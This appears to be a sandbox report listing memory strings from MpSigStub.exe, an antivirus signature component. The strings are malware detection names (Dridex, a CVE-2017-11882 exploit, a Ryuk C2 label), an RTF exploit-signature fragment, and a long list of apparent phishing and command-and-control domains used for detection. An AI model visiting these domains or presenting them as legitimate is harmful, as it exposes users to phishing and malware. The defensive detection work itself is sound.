Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: txg>>osixdustk8
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: trojandownloader:o97m/dridex.abe!eml
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: $trojandownloader:o97m/dridex.abe!eml
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: exploit:o97m/cve-2017-11882.rve!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: #exploit:o97m/cve-2017-11882.rve!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: {\rtf78044\page91063872723894035@nmljmdmhsqt5ua7x@-tiwyg4ih4hj8xqcag<eh&&0_m-d_g--_-d,64>36852$cv>yt=n5|:%_>n2%bm\agbt
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: x{\rtf78044\page91063872723894035@nmljmdmhsqt5ua7x@-tiwyg4ih4hj8xqcag<eh&&0_m-d_g--_-d,64>36852$cv>yt=n5|:%_>n2%bm\agbt
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: small.ms!mtb
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: fc.pdb
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: fc.pdb0
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: filedescriptiondos 5 file compare utility&
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: internalnamefc
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: originalfilenamefc.exed
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: fileversion1.1.6956.0:
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: productversion1.1.6956.0d
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: 0t1x12
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: 252>2h2q2[2g2m2t2}2
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: 3/353o3z3l3t3y3~3
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: 4$4c4i4s4y4b4g4
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: $c:\windows\system32\find.exemz
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\find\objfre\i386\find.pdb
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\find\objfre\i386\find.pdb0
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: .g-statics.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p*//guptaeyecentre.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p(.guptaeyecentre.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p0//harassmentadvisor.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p..harassmentadvisor.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p8//healthsurveysolutions.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p6.healthsurveysolutions.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p2//hotdiscountsonline.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p0.hotdiscountsonline.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p4//maffefinancialgroup.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p2.maffefinancialgroup.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p$//medicalreha.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p".medicalreha.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p$//notify-wkhs.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p".notify-wkhs.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p2//nyfinancialcontrol.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p0.nyfinancialcontrol.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p6//onedrivenotification.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p4.onedrivenotification.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p0//quickhealthsurvey.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p..quickhealthsurvey.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p //quip-docs.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: .quip-docs.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p(//r2techsystems.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p&.r2techsystems.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p0//realtek-analytics.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p..realtek-analytics.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p,//sagamorenetwork.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p*.sagamorenetwork.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p,//scripts-careers.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p*.scripts-careers.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p&//serve-update.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p$.serve-update.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p6//sharepoint-documents.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p4.sharepoint-documents.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p*//sharepointdocs.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p(.sharepointdocs.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: //smiogin.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: .smiogin.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p://tristatesignaturehomes.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p8.tristatesignaturehomes.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p8//ultracaremedicalgroup.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p6.ultracaremedicalgroup.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p&//webex-online.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p$.webex-online.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p$//webvpnproxy.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p".webvpnproxy.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p(//windowupdates.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p&.windowupdates.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: //zoom-mea.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: .zoom-mea.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: //maxs.fun
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: .maxs.fun
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: //jnorman.io
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: .jnorman.io
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p //foundcare.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: .foundcare.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: //hracc.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: .hracc.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p4//myamericandreamhome.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p2.myamericandreamhome.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p.//recruitercareers.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p,.recruitercareers.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: //smlogin.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: .smlogin.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p$//susangkomen.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p".susangkomen.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p8//transportationmanager.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p6.transportationmanager.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: //viewjs.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: .viewjs.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p"//vpn-access.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p .vpn-access.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p4//workplaceharassment.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p2.workplaceharassment.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p*//bloomington-il.org
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p(.bloomington-il.org
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p0//consumerprotector.org
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p..consumerprotector.org
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p://tobaccosurvivorsunited.org
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p8.tobaccosurvivorsunited.org
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p*//trans-equality.org
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p(.trans-equality.org
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p //xordinance.us
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: .xordinance.us
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: //b0x.xyz
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: .b0x.xyz
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: //maxh.xyz
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: .maxh.xyz
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: !#nri:ryukc2.b
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: zapored.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: gtrsqer.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: chalengges.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: caonimas.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: hakunaman.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p*getinformationss.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p"nomadfunclub.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: harddagger.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: errvghu.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: reginds.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p gameleaderr.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: razorses.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: vnuret.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: regbed.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: bouths.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: ayiyas.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p"serviceswork.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: moonshardd.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p hurrypotter.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: biliyilish.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: blackhoall.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p"checkhunterr.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: daggerclip.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: check4list.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: chainnss.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p hungrrybaby.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: martahzz.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p"jonsonsbabyy.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p wondergodst.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: zetrexx.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: tiancaii.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: cantliee.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: realgamess.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: maybebaybe.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p&saynoforbubble.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p chekingking.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: rapirasa.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: raidbossa.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: mountasd.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p"puckhunterrr.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: pudgeee.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p$loockfinderrs.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: lindasak.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: bithunterr.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: voiddas.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: sibalsakie.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: giveasees.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: shabihere.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p&tarhungangster.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: imagodd.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: raaidboss.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: sunofgodd.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p rulemonster.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: loxliver.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p(servicegungster.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p$kungfupandasa.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p$check1domains.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p$sweetmonsterr.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: qascker.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: remotessa.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: cheapshhot.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: havemosts.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: unlockwsa.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: sobcase.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p zhameharden.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: mixunderax.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: bugsbunnyy.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p(fastbloodhunter.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p(serviceboosterr.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p"servicewikii.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p secondlivve.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: quwasd.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p$luckyhunterrs.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: wodemayaa.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: hybriqdjs.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: gunsdrag.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: gungameon.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p"servicemount.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p(servicesupdater.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p*service-boosterr.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p(serviceupdatter.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p dotmaingame.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p&backup1service.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p&bakcup-monster.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p&bakcup-checker.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p$backup-simple.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p$backup-leader.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p$backup-helper.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p(service-checker.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p(nasmastrservice.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p&service-leader.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p,nas-simple-helper.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: nas-leader.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p(boost-servicess.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p&elephantdrrive.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p(service-hellper.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p*top-backuphelper.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: best-nas.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p,top-backupservice.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p,bestservicehelper.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: backupnas1.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p$backupmastter.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p best-backup.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p viewdrivers.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p,topservicebooster.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p.topservice-masters.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p0topbackupintheworld.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p*topbackup-helper.com
